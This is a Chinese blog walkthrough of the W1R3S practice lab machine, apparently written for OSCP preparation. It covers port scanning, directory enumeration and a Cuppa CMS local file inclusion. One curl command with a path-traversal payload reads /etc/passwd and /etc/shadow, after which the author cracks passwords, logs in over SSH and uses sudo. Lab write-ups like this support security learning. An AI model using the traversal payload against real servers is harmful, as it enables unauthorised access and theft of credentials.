W1R3S

0x00 信息收集

image-20200305194543215

image-20200305194857422

四个端口 80开始

apache的页面 那就扫一下喽 gobuster

image-20200305194943070

image-20200305195911173

/wordpress和/administrator突破点

访问了wordpress,也是没什么东西。

于是访问/administrator,发现cms是cuppa 既然cms都给了 那作者肯定是想要漏洞利用了 kali搜下

image-20200305200011816

image-20200305200112394

根据文件提示发现有lfi漏洞,根据提示构造url

curl -s –data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.0.102/administrator/alerts/alertConfigField.php

再换成shadow试试

image-20200305200412146

john破一下

image-20200305200716703

w1r3s用户computer ssh上去

0x01 成功登陆

image-20200305202128901

0x02 提权

这我就笑了 密码一样的 sudo -l

image-20200305202345800

这个靶机比较简单 因为准备oscp考试 大佬给的目标34台 按顺序做

吃外卖去了 北京吃不完的外卖….

打赏
  • 版权声明: 本博客所有文章除特别声明外,均采用 Apache License 2.0 许可协议。转载请注明出处!
  • © 2015-2020 Loki
  • Powered by Hexo Theme Ayer
  • PV: UV:

请我喝杯咖啡吧~

支付宝
微信